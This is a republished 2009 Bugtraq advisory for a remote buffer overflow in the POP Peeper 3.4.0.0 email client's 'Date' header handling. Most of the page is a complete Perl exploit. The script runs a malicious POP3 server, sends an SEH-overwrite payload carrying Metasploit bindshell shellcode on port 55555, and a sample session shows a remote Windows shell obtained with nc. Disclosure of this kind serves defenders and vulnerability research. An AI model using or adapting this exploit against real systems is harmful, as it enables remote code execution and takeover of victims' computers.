Home » Exploits » POP Peeper 'Date' Remote Buffer Overflow Vulnerability POP Peeper 'Date' Remote Buffer Overflow Vulnerability Feeds - Exploits Written by Jeremy Brown    Saturday, 14 March 2009 00:00 POP Peeper 'Date' Remote Buffer Overflow Vulnerability -\\Bugtraq ID: 34093 -\\Class: Boundary Condition Error -\\CVE: -\\Remote: Yes -\\Local: No -\\Published: Mar 12 2009 12:00AM -\\Updated: Mar 13 2009 05:26PM -\\Credit: Jeremy Brown -\\Vulnerable: Mortal Universe Software Entertainment POP Peeper 3.4 0 -\\Discussion POP Peeper is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. POP Peeper 3.4.0.0 is vulnerable; other versions may also be affected. -\\Exploit(s)/PoC(s): An attacker may exploit this issue by enticing a victim into connecting to a malicious server. The following exploit is available: =============================================================== 34093.pl ^^^^^^^^^ #!/usr/bin/perl # KL0309EXP-poppeeper_date-bof.pl # 03.12.2009 # Krakow Labs Development [www.krakowlabs.com] # POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit # # SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal # exploitation (more love for no /SafeSEH). Tested on Windows XP SP3. # # rush@KL (Jeremy Brown) [ This e-mail address is being protected from spambots. You need JavaScript enabled to view it ] # # rush@linux:~$ sudo perl KL0309EXP-poppeeper_date-bof.pl # xx.xx.xx.xx # rush@linux:~$ nc xx.xx.xx.xx 55555 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\POP Peeper>exit # exit # rush@linux:~$ # # Associated Files & Information: # http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt # http://www.krakowlabs.com/dev/exp/KL0309EXP-poppeeper_date-bof.pl.txt # http://www.krakowlabs.com/dev/exp/KL0309EXP-poppeeper_date-bof.jpeg # # KL0309EXP-poppeeper_date-bof.pl use IO::Socket; $nextsehh = 0x909006EB; # JMP 6 $sehh     = 0x10014E39; # Windows XP UNIVERSAL Imap.dll pop pop ret # Win32 Bindshell Shellcode (author=metasploit,port=55555,encoder=pexalphanum,size=709,exitfunc=thread) $sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .       "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .       "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .       "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .       "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" .       "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" .       "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x47" .       "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" .       "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x38" .       "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" .       "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" .       "\x46\x4f\x4b\x53\x46\x35\x46\x32\x4a\x42\x45\x57\x45\x4e\x4b\x48" .       "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54" .       "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58" .       "\x49\x38\x4e\x56\x46\x52\x4e\x51\x41\x36\x43\x4c\x41\x43\x4b\x4d" .       "\x46\x36\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x44\x4e\x30\x4b\x58" .       "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x55\x4a\x46" .       "\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" .       "\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x47\x43\x37" .       "\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .       "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e" .       "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .       "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" .       "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x55\x43\x35\x43\x35\x43\x34" .       "\x43\x55\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x49\x4d" .       "\x43\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x49\x4a\x46\x46\x4a" .       "\x4c\x31\x42\x47\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" .       "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" .       "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" .       "\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d" .       "\x42\x55\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .       "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x55" .       "\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x36" .       "\x4d\x36\x49\x48\x45\x4e\x4c\x36\x42\x55\x49\x45\x49\x32\x4e\x4c" .       "\x49\x48\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c" .       "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x54\x4e\x32" .       "\x43\x39\x4d\x48\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" .       "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" .       "\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x36" .       "\x41\x50\x41\x55\x41\x35\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .       "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36" .       "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f" .       "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" .       "\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x55\x4f\x4f\x48\x4d" .       "\x4f\x4f\x42\x4d\x5a"; $serv = IO::Socket::INET->new(Proto=>'tcp',                   LocalPort=>'110',                   Listen=>1,                   Timeout=>60) or die "Error: listen(110)\n"; $cli = $serv->accept() or die "Error: accept()\n"; print $cli->peerhost . "\n"; $nextseh = pack('l', $nextsehh); $seh     = pack('l', $sehh); $nop     = "\x90"; $payload = "Date: " . "A" x 132 . $nextseh . $seh . "\x90" x 32 . $sc . "\r\n.\r\n";      $cli->send("+OK\r\n");      $cli->recv($recvbuf, 512);      $cli->send("+OK\r\n");      $cli->recv($recvbuf, 512);      $cli->send("+OK\r\n");      $cli->recv($recvbuf, 512);      $cli->send("+OK 1 100\r\n");      $cli->recv($recvbuf, 512);      $cli->send("+OK\r\n1 w00t\r\n.\r\n");      $cli->recv($recvbuf, 512);      $cli->send("+OK\r\n1 100\r\n.\r\n");      $cli->recv($recvbuf, 512);      $cli->send("+OK 100 octets\r\n");      $cli->send($payload);      close($cli);      close($serv); -\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it . -\\References(s) --POP Peeper 3.4.0.0 Date Remote Buffer Overflow Vulnerability http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.tx  (Krakow Labs Research) --POP Peeper 3.4.0.0 Date Remote Buffer Overflow Vulnerability msg://bugtraq/ This e-mail address is being protected from spambots. You need JavaScript enabled to view it   (Krakow Labs) --POP Peeper Homepage http://www.poppeeper.com  (POP Peeper) --POP Peeper 3.4.0.0 Date Remote Buffer Overflow Vulnerability http://www.securityfocus.com/archive/1/50170  (Krakow Labs < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)

Security Services by HSC Contact us Become partner Advertise with us Join our staff